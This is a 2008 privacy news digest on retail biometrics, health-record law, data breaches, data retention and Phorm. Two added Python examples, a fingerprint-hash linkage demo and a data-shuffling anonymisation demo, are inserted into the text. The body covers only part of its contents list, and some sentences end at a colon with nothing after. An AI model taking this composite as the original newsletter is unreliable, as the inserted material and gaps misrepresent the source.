Privacy News Highlights
16–29 May 2008
Contents:
UK – Supermarket Secretly Photos Alcohol/Cigarette Buyers, Wants National Database
UK – Retailers Fingerprint Plans Prompt Privacy Concerns
US – Good Year for Privacy, Ontario Commissioner Says
CA – High-Tech Licenses Concern Privacy Commissioner
CA – PEI Appoints New Information and Privacy Commissioner
CA – New OPC Book Issued to Help Businesses Comply With Privacy Law
WW – Governments Should Avoid Web 2.0 "Trust Deficit"
US – Employee Snooping at the IRS
EU – E-voting Banned by Dutch Government
HK – Government Training to Raise Privacy Awareness
CA – Online Tax Centre Launched by City of Mississauga
CA – Senator’s Anti-Spam Bill Is Welcome News
CA – Pending Newfoundland Law Will Highlight Health-Record Privacy
CA – Albertans’ Right Confirmed to Limit Disclosure of PHI via Alberta Netcare
US – Health Data Systems Need A Comprehensive Privacy and Security Framework
US – Feds Encrypt 800,000 Laptops; 1.2 Million to go
US – University Project to Protect Privacy
IN – RIM Offers Conditional Solution to Monitor BlackBerry Content
UK – Experts Criticize UK Plan For Super-Database
EU – EDPS Issues Annual Report on Data Protection
EU – EDPS Reports on EU Institutions Data Protection
EU – EU Security Agency Calls for Breach Notification Law
EU – Street View Sparks Concerns
UK – Brits Living in Fear of Identity Fraud
US – Lawsuit Filed Against LendingTree
US – President Bush Signs Genetic Information Nondiscrimination Act of 2008
US – Google Releases Google Health for Medical Records
US – California Rejects Marketing Firms Access to Patient Medical Records
US – Bank of New York Mellon Backup Tape Lost
US – Used Server Held 5,000 SSNs
WW – Gartner: Many Data Security Breaches Still Not Reported
US – New York to Issue Enhanced Drivers Licenses
US – Nevada Attorney General Offers Special Program to Assist Identity Theft Victims
UK – Identity Fraud Cases Up By Two Thirds
US – CDT Issues Privacy Principles for Digital Watermarking
WW – OECD Warns On Internet Address Change
IN – Cyber Café Web Surfing Surveilled
CA – Cyber Crime Growing Fast In Canada: Report
US – Senators Ok $1 Billion for Online Child Porn Fight
AU – Secret Anti-Doping Program Scrapped
UK – Privacy Group Launches Phorm Spoiler
WW – Facebook Disconnects Google Friend Connect
CA – Privacy and ‘Online’ Dating Are Not Mutually Exclusive
AU – New Australian Privacy Tort a Blow to Free Speech?
PH – Looking Westward on Data Privacy Framework
US – Treasury Proposes Forcing Credit Card Companies to Act as IRS Agents
US – Survey Finds Most Unaware of Sale of Personal Data
US – VeriChip to Place Implantable Division on Block
WW – One in Four Data Breaches Involves Schools
UK – Study: Schools Gathering CCTV Evidence Illegally
US – Court Ruling Gives Police Broad Authority to Check License Plates
US – No Cell Phones on Flights Please, Say Airline Passengers
UK – Shops Tracking Their Customers Via Mobile Phone
UK – UK Law Would Expand Data Retention Requirements for Telecom Providers
UK – Lawmakers Ask ISP Not to Share Data
UK – Identity Fraud Hits Net Telephony
EU – Deutsche Telekom Accused of Accessing Retained Call Data
US – DHS to Monitor Access to IT Systems
UK – MPs demand US Spooks' Guarantees On Census Data
US – NY Governor Introduces Stronger ID Theft Laws
US – California Bill Would Let Pharmacies Sell Medical Records
US – Rhode Island Bill Would Grant Anonymity to Pamphleteers
US – Corporations Massively Read Employee E-Mail
IS – Draft Policy for Employee Privacy
US – TJX Fired Employee for Making Posts About Lax Security
Budgens, a London supermarket chain, is secretly recording biometric facial photos of
people who buy cigarettes and alcohol and comparing them to a database of known
underage buyers, and they’re hoping to link their database with other grocery
chains around the country. This means that just bringing a bottle up to the
till means that your likeness and details will be added to a nationwide
database, recording your movements and purchasing habits. It is believed to be
the first time a British retailer has used the technology in this way. [Source]
The use of fingerprint recognition technology to monitor retail staff working hours
has serious privacy implications, say experts. A small group of Budgens and
Costcutter shops have introduced the system to monitor the hours worked by
staff and to prevent staff clocking each other in. The systems do not store the
print itself, but log a number which can then be matched against the number
generated next time that person clocks in. But there are serious legal data
protection implications, according to Gus Hosein, a digital privacy expert at
the London School of Economics (LSE). “The number is still a unique
identifier,” he said. “It’s fine if people have a choice, but if you compel
workers to do this, you run into the dirty side of the law.” The retailers’
plans may raise issues regarding compliance with the Data Protection Act (DPA),
which “requires that the employer justify that fingerprint technology is
appropriate in the circumstance and must demonstrate why other less intrusive
methods would not do the job.” A fingerprint technology project aimed at tracking
travellers at Heathrow Terminal 5 was abandoned last month following pressure
from the ICO. [Source]
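Hosein's point, that a logged number derived from a print is still a unique identifier, can be shown in code. The Python below is an added example, not the Budgens or Costcutter system: the fingerprint templates are constructed placeholder byte strings, the site names and keys are hypothetical, and it compares a plain hash of the template with a per-site keyed HMAC. With the plain hash the same finger produces the same number at every site, so clock-in records are linkable across retailers; with per-site keys the number still uniquely identifies the worker within one site (which is the compulsion problem Hosein raises) but cannot be joined across sites.

```python
from __future__ import annotations

import hashlib
import hmac
from collections import defaultdict

# Constructed stand-ins for fingerprint templates (a real terminal would derive
# minutiae data from the scan). These are placeholders, not biometric data.
TEMPLATES = {
    "alice": b"minutiae-template:alice:placeholder",
    "bob": b"minutiae-template:bob:placeholder",
    "carol": b"minutiae-template:carol:placeholder",
}


def unkeyed_number(template: bytes) -> str:
    """The 'number' a terminal logs instead of the print: a plain hash of the
    template. Deterministic, so the same finger yields the same number on
    every terminal that uses this function."""
    return hashlib.sha256(template).hexdigest()[:16]


def keyed_number(template: bytes, site_key: bytes) -> str:
    """Same idea, but bound to a per-site secret key via HMAC. Within one
    site the number still matches the same finger on every clock-in; a
    different site with a different key gets an unrelated number."""
    return hmac.new(site_key, template, hashlib.sha256).hexdigest()[:16]


def clock_in_log(site: str, derive) -> list[tuple[str, str]]:
    """Simulate one day's clock-ins at a site; only (site, number) is logged."""
    return [(site, derive(t)) for t in TEMPLATES.values()]


def cross_site_links(logs: list[tuple[str, str]]) -> dict[str, set[str]]:
    """Numbers that appear at more than one site. Each such number links one
    person's records across those sites."""
    sites_by_number: dict[str, set[str]] = defaultdict(set)
    for site, number in logs:
        sites_by_number[number].add(site)
    return {n: s for n, s in sites_by_number.items() if len(s) > 1}


def linkable_with_unkeyed() -> int:
    """Two hypothetical sites that share the unkeyed derivation."""
    logs = clock_in_log("site-A", unkeyed_number) + clock_in_log("site-B", unkeyed_number)
    return len(cross_site_links(logs))


def linkable_with_keyed() -> int:
    """The same two sites, each with its own secret key (constructed values)."""
    keys = {"site-A": b"constructed-key-A", "site-B": b"constructed-key-B"}
    logs: list[tuple[str, str]] = []
    for site, key in keys.items():
        logs += clock_in_log(site, lambda t, k=key: keyed_number(t, k))
    return len(cross_site_links(logs))


if __name__ == "__main__":
    print("numbers linkable across sites, unkeyed:", linkable_with_unkeyed())  # 3
    print("numbers linkable across sites, keyed:  ", linkable_with_keyed())    # 0
```

Two caveats for anyone reading this as a design sketch. First, real fingerprint matching is fuzzy: two scans of the same finger do not produce byte-identical templates, so deployed systems store a template and run a matcher rather than hashing, which is exactly why the stored "number" is as sensitive as the print it stands for. Second, the keyed variant only limits linkage across sites; inside one site it remains a persistent identifier for as long as the key lives, and the finger behind it can never be reissued.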
A number of new technologies, as well as important rulings by Ontario courts,
have improved the privacy of people in Ontario in 2007 according to the annual
report of the Information and Privacy Commissioner, released last week. For the
first time ever, Commissioner Ann Cavoukian used her power in September of 2007
to order the city of Ottawa and the Ottawa police to stop collecting personal
information from people selling used items to pawn shops. The commissioner also
noted the development of a number of new technologies that could help protect
people’s privacy. The report for 2007 also shows that year setting a new record
in FOI requests, much of the increase coming from requests for information from
municipalities and police forces. [Source]
[Ont. privacy czar worried about high-tech licences] [Ontario's privacy czar frustrated by lack of progress on EHR]
Ontario's Information and Privacy Commissioner Ann Cavoukian has urged the federal government
to withdraw a requirement for provinces to collect citizenship information and
create databases for Canada's enhanced driver's licences. Speaking to reporters
in Toronto yesterday, Cavoukian said that this "mirror database"
method could lead to the exposure of personal information and identity theft,
says a CTV.ca report. "It would create enormous risks in terms of
inaccuracy, the potential for identity theft of creating a new database with
very sensitive information, not to mention a waste of efficiency in taxpayer
dollars," Cavoukian said. She is also concerned that radio frequency
transmitters may be embedded into the licences, citing the risk of improper
monitoring. [Source] [Sharing citizenship data a 'no brainer,' Ottawa told] [Ottawa urged to share database]
PEI’s new Acting Information and Privacy Commissioner has been appointed, effective
May 26, 2008. Her name is Judith M.
Haldemann, and she recently retired as Legislative Counsel with the province.
[Source]
The Office of the Privacy Commissioner of Canada (OPC) has launched a new book to
help businesses comply with PIPEDA. Leading
by Example: Key Developments in the First Seven Years of PIPEDA shares
insights gained since PIPEDA came into force in 2000 by highlighting some of
the leading case findings on a number of important issues, including emerging
technologies, data breaches and security measures. “Hundreds of our findings
and numerous judicial decisions together form an essential body of
recommendations and case law,” says Assistant Commissioner Elizabeth Denham. [Source] [Leading by
Example: Key Developments in the First Seven Years of the Personal Information
Protection and Electronic Documents Act] See also: [IAPP INTERVIEW: Elizabeth Denham]
If governments want to attract citizens to use their online services, they should
give users control of their own information, according to former privacy
commissioner and IAPP board member Malcolm Crompton, who spoke to attendees at
the CeBIT conference in Sydney yesterday. Crompton, who is now managing
director of Information Integrity Systems, said that requiring citizens to submit
vast amounts of personal data imposes too much risk on users with little or no
liability on the agency, creating what he describes as a "trust
deficit." "Where is the citizen in this level of thinking?"
Crompton asked. [Source]
Snooping is on the rise at the Internal Revenue Service (IRS), according to a Treasury
Department investigator who testified before Congress last month. Five hundred
twenty one cases of unauthorized access were reported last year and, earlier
this week, five employees at the Fresno, California processing center were
charged with computer fraud and unauthorized access to tax return information
for unnecessary viewing of taxpayers' files, says a Wired report. "Whether
the intent is fraud or simply curiosity, the potential exists for unauthorized
access to tax information on high-profile individuals and other taxpayers,"
said J. Russell George, Treasury Department Inspector General for Tax
Administration. [Source]
Because of a risk of eavesdropping, the government of the Netherlands has banned
electronic voting machines from future elections, and will return to paper
voting. In its decision, the government also banned so-called voting printers.
Because they leave a paper trail, the printers had been suggested as a
potential alternative to traditional voting computers that store the vote
counts in their memory. A group of experts dismissed the printer option. The
group concluded that “even with regular testing of each printer, it can’t be
guaranteed that all devices stay within the required emission limits” that
safeguard against eavesdropping. Earlier rulings against voting machines have
occurred in other regions including California, Germany, the U.K., Ireland and
Italy. [Source]
Hong Kong government staff will undergo training to raise awareness of information
security and privacy. Topics to be covered include the handling of official
documents outside the office and a review of relevant policies and guidelines.
Government departments accounted for 14 of 30 cases involving leaks of personal
data over the past three years. These leaks have been attributed to a lack of
awareness of information-security regulations, policies and
guidelines, especially those concerning the use of portable electronic devices
and file-sharing software. [Source]
An online tax centre was launched by the City of Mississauga, which will allow
residents to access self-serve tax services on the City’s Web site. These services
include viewing tax account details and tax and assessment information, changing
the “Preauthorized Tax Payment” plan, and purchasing tax certificates. The
new online tax centre can be accessed at:
www.mississauga.ca/etax [Source]
While a government-backed anti-spam bill is still nowhere to be seen, earlier this
month Senator Yoine Goldstein quietly stepped into the policy void by
introducing the Anti-Spam Act (ASA). Modeled after widely lauded
Australian anti-spam legislation, the ASA is the most comprehensive Canadian
anti-spam proposal floated to date and even if it languishes in the Senate it
promises to place additional pressure on the government to reveal its own
anti-spam plan. The bill targets spam by creating new form and content
requirements for commercial electronic messages as well as establishing
prohibitions on common spamming techniques. The content requirements include
the need to clearly identify the sender of the message, provide accurate
“header” information, avoid misleading subject lines and include information on
how recipients can contact the sender directly. Commercial email senders must
also establish a functional unsubscribe facility that enables recipients to
easily opt-out of future messages. The ASA also establishes a broad prohibition
against “the sending of a commercial electronic message unless the recipient
has consented to receive the message.” This provision contains several key
exceptions, however, since political parties, charities, not-for-profit
businesses, survey companies, educational institutions and any business with a
prior business relationship are all entitled to presume that they have the
necessary consents unless recipients expressly “opt-out.” Senator Goldstein’s
bill also targets common spamming technologies. It prohibits the use of
address-harvesting software that spammers use to gather email addresses,
outlaws “dictionary attacks” in which spammers send millions of messages
without regard for whether the email addresses are valid, and bans the creation
of phishing websites that are used by identity thieves to fraudulently obtain
personal information. While many of these provisions match those found in other
jurisdictions, the most noteworthy aspect of the ASA is its tough penalties.
First time offenders face a fine of up to $500,000 and any repeat offences
could result in fines of up to $1.5 million. Moreover, the bill includes possible
prison terms of up to five years for violating the core anti-spam provisions
and grants the private sector the right to seek injunctions to block further
spamming activity. Unlike some prior bills that sought to hold Internet service
providers responsible for the spam on their networks, the ASA creates
incentives for ISPs to cut off spamming activity by granting ISPs the right to
cancel the service of known spammers without fear of liability. The ASA has
reached second reading in the Senate and now awaits the prospect of committee
hearings. [Source]
New rules governing health records will strengthen Newfoundland and Labrador
patients’ privacy, the health minister Ross Wiseman said last week. Wiseman
said that the new Protection of Personal Health Information Act, which
is currently before the house of assembly, will more clearly spell out how a
patient’s data can be used, and by whom. The act, once passed into law, will
set out new rules for the collection, use and disclosure of people’s personal
health records. Wiseman said the goal of the legislation is to create a culture
of privacy in the health-care system. The new act allows patients to prevent
the sharing of their personal information. For example, patients can designate
that certain parts of their medical records are not to be shared beyond any
pre-designated health professionals. The government expects to have the
legislation proclaimed into law in 18 months, to allow for education and
training within the health-care system. A public education campaign is also
planned. [Source]
Frank Work, Alberta Information and Privacy Commissioner, has confirmed that individuals
can ask that disclosure of their health information through Alberta Netcare,
Alberta’s electronic health record, be limited. On conclusion of a recent
investigation, it was recommended that Alberta Health and Wellness take steps
to fully implement the technology that will allow custodians to limit the
disclosure of health information through Alberta Netcare and communicate the
availability of this option to Netcare users and Albertans. The Department has
taken immediate steps to implement these recommendations. [Coverage]
The investigation report and its recommendations can be found at http://www.oipc.ab.ca [Alberta Netcare investigation decision]
CDT's Health Privacy Project released a paper urging policymakers and
the private sector to develop and implement a comprehensive privacy and
security framework to govern the wide range of computer and Internet-based
systems being created to share sensitive health information. The paper examines the key issues
confronting the adoption of information technology in the health care field and
offers suggestions on policies and business practices that will protect patient
rights while facilitating the kinds of information sharing that can reduce
costs and improve care. [HPP Policy
Framework Document, May 15, 2008]
In an effort to secure the personal data of millions, U.S. federal agencies have
begun purchasing and deploying encryption software for the roughly two million
laptops, handhelds and removable storage devices at federal, state and local
government agencies nationwide. Over the last 12 months agencies have purchased
800,000 licenses for the software through the government’s Data at Rest
Encryption program, a joint venture of the General Services Administration and
the Department of Defense. [Source]
Oklahoma State University's Technology Business Assessment Group has provided $100,000
to fund a project aimed at protecting the privacy of online data using the data
shuffling method. The project, "Developing Data Protection Software Based
on Data Shuffling," involves faculty researchers from OSU and the
University of Kentucky. Data shuffling, the method developed by OSU professor
Rathindra Sarathy, "rearranges confidential information from data sets in
a complex, coordinated fashion so that it maintains confidentiality." The
goal is to develop the shuffling method into a marketable software program. [Source] [Powerpoint] [Paper]
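The data shuffling idea can be made concrete. The Python below is an added example and not the OSU project's software: it is a simplified reconstruction of the method (the assumption here is a linear model with Gaussian noise for the confidential value conditioned on one non-confidential attribute; the published method handles more general conditional distributions) run on a constructed dataset of ages and incomes. Perturbed values are drawn from the fitted conditional model, then each record receives the original confidential value that has the same rank as its perturbed value. The released column therefore contains exactly the original values, attached to different records, while the rank correlation with the non-confidential attribute is retained.

```python
import random


def linear_fit(s, x):
    """Ordinary least squares of x on s; returns (intercept, slope)."""
    n = len(s)
    mean_s, mean_x = sum(s) / n, sum(x) / n
    sxx = sum((a - mean_s) ** 2 for a in s)
    sxy = sum((a - mean_s) * (b - mean_x) for a, b in zip(s, x))
    slope = sxy / sxx
    return mean_x - slope * mean_s, slope


def ranks(values):
    """0-based rank of each element (ties broken by position)."""
    order = sorted(range(len(values)), key=values.__getitem__)
    r = [0] * len(values)
    for rank, i in enumerate(order):
        r[i] = rank
    return r


def spearman(a, b):
    """Spearman rank correlation, computed as the Pearson correlation of ranks."""
    ra, rb = ranks(a), ranks(b)
    n = len(a)
    ma, mb = sum(ra) / n, sum(rb) / n
    num = sum((p - ma) * (q - mb) for p, q in zip(ra, rb))
    den = (sum((p - ma) ** 2 for p in ra) * sum((q - mb) ** 2 for q in rb)) ** 0.5
    return num / den


def data_shuffle(s, x, rng):
    """Simplified data shuffling (assumption: linear-Gaussian conditional model).

    s: non-confidential attribute, released unchanged
    x: confidential attribute; its values are kept, their assignment to records changes
    """
    intercept, slope = linear_fit(s, x)
    resid = [b - (intercept + slope * a) for a, b in zip(s, x)]
    sd = (sum(r * r for r in resid) / len(resid)) ** 0.5
    # Step 1: draw a perturbed value for every record from the fitted
    # conditional distribution of x given s.
    perturbed = [intercept + slope * a + rng.gauss(0, sd) for a in s]
    # Step 2 (reverse mapping): the record whose perturbed value has rank k
    # receives the k-th smallest ORIGINAL confidential value.
    sorted_x = sorted(x)
    return [sorted_x[r] for r in ranks(perturbed)]


def make_sample(n=200, seed=1):
    """Constructed dataset: age (non-confidential) and income (confidential)."""
    rng = random.Random(seed)
    ages = [rng.uniform(20, 70) for _ in range(n)]
    incomes = [1500 + 40 * a + rng.gauss(0, 300) for a in ages]
    return ages, incomes


def demo(seed=1):
    """Shuffle the constructed sample and report what was preserved and what changed."""
    ages, incomes = make_sample(seed=seed)
    released = data_shuffle(ages, incomes, random.Random(seed + 1))
    return {
        "values_preserved": sorted(released) == sorted(incomes),
        "records_changed": sum(1 for a, b in zip(incomes, released) if a != b),
        "rho_original": spearman(ages, incomes),
        "rho_shuffled": spearman(ages, released),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running `demo()` shows the trade-off the passage describes: the multiset of incomes is unchanged, so aggregate statistics on the released column are exact, while almost every record now carries someone else's income and the age/income rank correlation stays close to the original. The residual risk to keep in mind is that rare values survive intact: an extreme income is still present in the release, just attached to a different row, so an adversary who already knows a target's exact value can still confirm it is in the dataset.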
In a new turn to the BlackBerry row, the Canadian vendor of the service, Research
in Motion (RIM), is understood to have agreed to pass on sensitive customer
data to the Indian government but with a condition that DoT takes
responsibility in case of a loss to any user due to leakage of information. [Source] [Source] Follow up: [RIM says it can’t provide e-mail interception in India]
Plans for a super-database containing the details of all phone calls and e-mails sent
in the UK have been heavily criticized by experts. The government is considering
the changes as part of its ongoing fight against serious crime and terrorism.
Assistant Information Commissioner Jonathan Bamford has warned that the UK
could be "sleepwalking into a surveillance society". [BBC]
On 15 May, the European Data Protection Supervisor’s office presented their 4th
Annual Report, which runs through the main features of the EDPS activities in
2007 on supervisory and consultative tasks. It also emphasises the impact of
the Lisbon Treaty that provides for an enhanced protection of personal data.
The EDPS believes that the new Treaty should be seen as an opportunity for the
EU administration to demonstrate that effective protection of personal data is
a basic value underlying EU policies. The report shows that there has been
substantial progress in supervision in 2007. The report highlights
The EDPS also gave further effect to his advisory role on new EU legislative
proposals having an impact on data protection with the publication of 12
legislative opinions. Special emphasis was put on:
[EDPS 2007 Annual Report | Executive Summary] [Full text]
On 14 May, the European Data Protection Supervisor (EDPS) presented his general
report on the “Spring 2007” initiative, which measured the implementation of
Regulation (EC) 45/2001 on the protection of individuals with regard to the
processing of personal data by the institutions and bodies of the Community.
The report shows that the “Spring 2007” exercise has helped to boost compliance
with the Regulation, if only because it has encouraged the appointment of a
Data Protection Officer (DPO) in every EU institution and operational agency.
In addition, it has prompted most institutions and agencies to draft an
inventory of processing operations involving personal data, which allowed a
more systematic approach to implementation. From a more general perspective, EU
institutions and bodies have also devoted more efforts in raising awareness
among EU staff on data protection issues. [Source]
The European Network and Information Security Agency (ENISA) released a report
outlining the need for a continent-wide data breach notification law. ENISA is
an information-sharing body. The report calls for a U.S.-style notification
law, highlighting the fact that Internet security is vital to the EU economy.
[Source]
[ENISA 2007 Annual Report] [press briefing podcast]
European Union Data Protection Supervisor Peter Hustinx says if Google plans to launch
its "Street View" feature in Europe, they should consider reforming
it, as the service may breach EU privacy laws, says a BusinessWeek report.
Street View gives users a 360-degree view of city streets in full color. The
feature is built using composites from photos taken from Google cars outfitted
with roof-mounted cameras. Street View's North American release raised both
excitement and privacy concerns. Hustinx said, "Making pictures on the
street is in many cases not a problem, but making pictures everywhere is
certainly going to create some problems." [Source]
Identity fraud and information theft from mobile phones top the list of security
concerns in the UK. 86% of almost 1,000 Brits polled in the Unisys Security
Index are worried about the unauthorised access or misuse of their personal
information. Computer security is less of a priority in the UK: the index found
only a third are very concerned about viruses and spam, with 38% not concerned
at all. Confidence is also growing in the security of online shopping,
particularly among the over-54s, with only 33% of residents very concerned
about the security of transactions. However, the UK remains unconvinced about
using mobiles to pay bills or shop online, with 80% not willing to use a mobile
or personal organiser to conduct financial transactions. The index comes on the
back of a similar survey of 4,500 adults in the UK by telecoms regulator Ofcom,
which revealed approximately half the respondents were worried about disclosing
personal details online, and concerns about identity fraud had risen by 15% in
two years. Unisys said the index showed that telecoms providers, banks and retailers
would face an uphill struggle to convince the public to accept mobile phone
payments. [Source]
A lawsuit seeking class action status has been filed against LendingTree LLC in US
District Court. The suit alleges that LendingTree did not sufficiently protect
sensitive data in its customer loan request forms. In April, LendingTree
acknowledged that several employees provided a number of mortgage lenders with
access to the data, which include names, Social Security numbers (SSNs) and
income. LendingTree has filed a lawsuit against two former employees and
several mortgage lenders. [Source]
The Genetic Information Nondiscrimination Act prohibits health
insurers and employers from discriminating on the basis of genetic information.
The Act would prevent health
insurers from canceling, denying, refusing to renew, or changing the terms or
premiums of coverage based solely on a genetic predisposition toward a specific
disease. The legislation also bars employers from using individuals’ genetic
information when making hiring, firing, promotion, and other employment-related
decisions. [Source]
Google unveiled Google Health, a
long-anticipated health information service that combines the leading Web
company’s classic search services with a user’s personal health records online.
The password-protected service provides a personalized profile for Google users
of their basic medical history and gathers relevant information connected to a
user’s health conditions. One feature includes a link to help users find
doctors by location or specialization. The “virtual pillbox” notifies patients
when they need to take medications and warns of possible interactions between
different drugs. Users can also import medical records if they are available in
digital form. The service includes links to major U.S. pharmacies, doctors’
groups and medical testing labs. Partners include Walgreen Co, Longs Drugs
Stores Corp, CVS Caremark Group, AllScripts, Quest Diagnostics and the
Cleveland Clinic. The company had previously said it was working with health
insurers such as Aetna Inc and Wal-Mart Stores Inc pharmacies. Google aims to
foster sharing of information between these services, but keep control in
patients’ hands, allowing them to schedule appointments or refill prescriptions,
for example. The electronic health records field remains in its early stages.
For example, while medical providers are covered by U.S. privacy laws, there is
little in the way of established privacy, security and data usage standards for
electronic personal health records despite decades of industry effort.
Nonetheless, Google has created an extra level of security around personal
health information stored on its computers. The service also contains a variety
of cautions and notifications to alert individual users to the dangers of
exposing their health data. [Source]
The California Senate rejected a bill this week that would have allowed the sharing
of a patient's confidential medical information regarding prescription drugs
among a pharmacy, third party corporations and pharmaceutical companies. The
bill was granted a second chance to pass the Senate next week. The Consumer
Federation of California opposed SB 1096 (Calderon) because it raised
significant privacy and health care concerns for patients. The bill would have
created an exception to California's Medical Information Act, allowing the
sharing of confidential patient drug prescription information without a
patient's consent. Under SB 1096, drug stores would provide confidential
patient prescription information to third party businesses. The third party
would prepare mailings to patients that would have the appearance of coming
from the pharmacy. These third party marketing corporations would, in turn
provide patient information to, and receive payment from, pharmaceutical drug
manufacturers to send the mailings, ostensibly to remind patients to take their
medications or to renew their prescriptions. Consumer rights and privacy
protection groups argued that this type of privacy invasion should not occur
without the consent of the patient. [Source]
[Groups Want More Privacy in E-Prescribing Mandate]
Connecticut Attorney General Richard Blumenthal wants to know how the Bank of New York Mellon
lost unencrypted computer backup tapes that hold PII of more than 4 million
customers. The box of tapes was lost in February; the tapes contain names,
addresses, SSNs and possibly account numbers and balances. The breach affects
several hundred thousand Connecticut customers of People’s United Bank; Bank of
New York had the data because it was helping People’s through a business
transition. Blumenthal wants to know why Bank of New York waited until just six
weeks ago to start notifying affected customers. Blumenthal himself did not
learn of the breach until earlier this week. In a related story, Connecticut
Governor M. Jodi Rell has directed the state’s Consumer Protection Division to
subpoena Bank of New York Mellon Corp. and People’s United Bank. [Source] [Source] [Source]
See also: [Connecticut Bank Customers File Lawsuit Over Missing Backup Tapes]
A man who bought used computer equipment at an auction found that one of the
servers contained 5,000 SSNs from the Oklahoma state Tax Commission and the
Corporation Commission. Oklahoma state policy requires that the agency
discarding computer equipment be responsible for erasing any data before the
equipment is sold. The Oklahoma Corporation Commission has begun removing hard
drives from equipment it sells at state auctions. [Source]
A recent study from Gartner found that many retail data security breaches in the
US are not being reported to customers. Of 50 US retailers surveyed, 18 said
they knew they had experienced a data breach, but just three of the retailers
had publicly disclosed the breach. While the small sample precludes drawing
hard conclusions, the trend suggests that “there are a lot more breaches than
we hear about,” according to Gartner analyst Avivah Litan. Four of the
retailers participating in the survey had been fined for failing to comply with
Payment Card Industry (PCI) standards, and 11 more were threatened with fines.
[Source]
Governor David A. Paterson has announced an agreement between New York State and the
Federal Department of Homeland Security (DHS) permitting the state to issue an
Enhanced Driver License (EDL). The new license is being developed by the State
Department of Motor Vehicles (DMV), and it is intended to expedite cross-border
land and sea travel for the citizens of the state. To get an EDL, New Yorkers
will be required to visit a DMV office to provide various proofs of identity
and citizenship, which will be verified by the DMV. The verification will
support the DMV’s core principle of one driver, one license and each EDL will
have various security features within the document. [Source]
In 2007, Nevada was ranked third in the nation for identity theft crimes. To help
address this situation, the Nevada Attorney General’s office is offering the Nevada Identity
Theft Passport program as a service to Nevada residents who are identity theft
victims to assist them with recovery from this intrusive and damaging crime.
After you discover that you have become the victim of identity theft, you will
need to file a police report with local law enforcement and ask for the Nevada
Identity Theft Passport brochure and application. You will then make an
appointment with your local County Sheriff or Attorney General’s Office to
complete an online “Passport” application. The Sheriff’s Office will then send
the completed application to the Attorney General’s office in Carson City.
After we verify the application, you will receive a secure, personalized Nevada
“Passport” program card that contains your picture, signature and thumb print.
This card is an effective tool for you to use in order to demonstrate that your
identity has been stolen. It is likely to be most useful to help you explain
your situation to merchants, banks and law enforcement officials. An Identity
Theft Passport does not prevent identity theft. It can only assist in helping
to clear things up afterwards. [Source]
London was Britain’s identity fraud capital with people almost twice as likely to
become victims as those in the rest of the country. Kensington was the most
vulnerable area with residents facing a risk more than three-and-a-half times
the average. It was followed in the top five by Richmond-upon-Thames, Putney,
Wimbledon and the King’s Road area of Chelsea. Commuter towns, including
Guildford, St Albans and Windsor, also faced a risk that was twice the national
average. Credit data company Experian, which compiled the figures, said more
than 6,000 victims sought help from its fraud team in 2007 compared with 3,500
in 2006. It said the typical identity fraud victim is a homeowner aged between
26 and 45. Those earning more than £50,000 a year are almost three times more
likely to fall victim to identity fraudsters. [Source]
CDT has released a paper offering a set of principles for addressing potential
privacy considerations when deploying digital watermarking technology. This
technology embeds information within the content of digital media files in a
form that is machine readable but often imperceptible to humans. Digital
watermarking has a variety of applications and is increasingly being considered
as a tool for deterring copyright infringement. CDT’s paper is intended to
provide guidance for companies that plan to use the technology to communicate
information that is specific to individual consumers. [CDT Paper: Privacy
Principles for Digital Watermarking, May 29, 2008] [CDT Press Release, May 29, 2008]
Slow progress on the net's new addressing system risks breaking it into regional
blocks, warns the OECD. The problem may come as nations move to the new scheme
at different paces, says the Organisation for Economic Co-operation and
Development. [BBC]
[OECD Report on Ipv6]
It is now mandatory for Uttar Pradesh cyber café owners to verify the identity of Web surfers, and a local firm has provided the software needed to build a database of them. Customer Registration and Identification, or CRISH, will include the photographs and fingerprints of those sitting at a cyber café’s computer. These identifiers “will be automatically stored in the database of the computer with date, time and terminal in which they logged on, eliminating the need for maintaining a register of visitors,” said the director of the company providing the database software. The database is expected to remove the anonymity of cyber café e-mail communications, in the hope that users won’t feel comfortable sending threatening e-mails from those locales, and to give investigators a quick and accurate means of identifying the sender of such a communication. [Source]
Canadians are more likely to be victims of crime on the Internet than they are on the streets, suggests a new survey commissioned by the Canadian Association of Police Boards. Cyber crime – things such as identity theft, computer viruses and online harassment – is very close to surpassing illicit drugs as the top crime category in North America. The survey, completed last January by Deloitte LLP, found that nearly half of the 567 respondents had been victims of cyber crime, and 70% said they did not report the crime. Almost everyone surveyed – 95% – thought they were being targeted by cyber criminals. “If that doesn’t scare you, I don’t know what will scare you,” said Calgary police Chief Rick Hanson during a news conference last week. [Source]
A U.S. Senate panel has unanimously approved a bill that would encourage federal, state, and local police to use and create special software designed to nab child pornography swappers on peer-to-peer file-sharing networks. The bill would allocate more than $1 billion over the next eight years for a broad array of efforts aimed at tackling Internet crimes against children. The Senate Judiciary Committee voted to send an amended version of the Combating Child Exploitation Act to the full Senate for a vote. [CNET]
The Australian Sports Anti-Doping Authority (ASADA) has been forced to scrap a secret pilot program aimed at identifying whether or not Olympic-bound athletes were using banned substances, because the program breached the Information Privacy Principles of the Privacy Act. ASADA had teamed up with Medicare to cross-check athletes' medical records, unbeknownst to the athletes. Although the Australian Government Solicitor (AGS) had originally approved the program, in a second opinion following Sport Minister Kate Ellis's consultation with the Office of the Privacy Commissioner, the AGS ruled that ASADA did not have legal authority to conduct the program. [Source]
A privacy group has launched a new piece of software that it claims will make the data collected by the Phorm advertising service “absolutely worthless”. The AntiPhorm group - which describes itself as “a loose conglomeration of concerned individuals comprised of artists, programmers and designers” - says it wants to prevent ISPs from profiting from their customers’ personal surfing habits. “By harvesting the information you divulge every time you surf the internet, BT alone expects to make an additional $170M annually,” the website claims. “The increase of data mining, profiling of you and your surfing habits is a worrying trend, on a global industrial scale.” To throw Phorm off the scent, the team has developed an application called AntiPhormLite that sits in the background, visiting random sites. “It connects to the web and intelligently simulates natural surfing behaviour across thousands of customisable topics,” the site claims. “This creates a background noise of false information disguising and inverting your own interests. We believe our technology is indistinguishable from that of a typical user engaging the internet.” [Source] SEE ALSO: [UPDATE: Charter Will Track Your Internet Activity Regardless Of Whether You Opt Out]
Facebook says it denied Google Friend Connect access to Facebook user data for failing to respect its privacy requirements. “We’ve found that [Friend Connect] redistributes user information from Facebook to other developers without users’ knowledge, which doesn’t respect the privacy standards our users have come to expect and is a violation of our Terms of Service,” said Facebook in a blog post. “Just as we’ve been forced to do for other applications that redistribute data in a way users might not expect or understand, we’ve had to suspend Friend Connect’s access to Facebook user information until it comes into compliance.” [Source] See also: [Cross-Site Scripting Flaw in Facebook] [Source]
